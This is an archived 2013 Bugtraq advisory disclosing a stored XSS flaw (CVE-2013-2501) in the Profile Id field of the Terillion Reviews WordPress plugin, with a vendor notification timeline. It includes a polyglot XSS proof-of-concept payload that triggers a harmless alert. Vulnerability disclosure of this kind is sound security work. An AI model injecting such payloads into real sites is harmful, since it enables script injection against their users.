| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 8 Mar 2013 16:43:45 GMT From: nauty.me04@...il.com To: bugtraq@...urityfocus.com Subject: Stored XSS in Terillion Reviews Wordpress Plugin CVE Assigned-CVE-2013-2501 ############################# Exploit Title : Stored XSS in Terillion Reviews Plugin Author: Aditya Balapure home: http://adityabalapure.blogspot.in/ Date: 08/03/13 Software link: http://wordpress.org/extend/plugins/terillion-reviews/ ############################# The Terillion Reviews Plugin in Wordpress http://wordpress.org/extend/plugins/terillion-reviews/ has a Stored XSS Vulnerability in the Profile Id input box. PoC Script Used Script Used- ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> Vendor Notification 20/02/2013 - Vendor notified awaiting action 07/03/2013 - Removed from the Wordpress Repository
Powered by blists - more mailing lists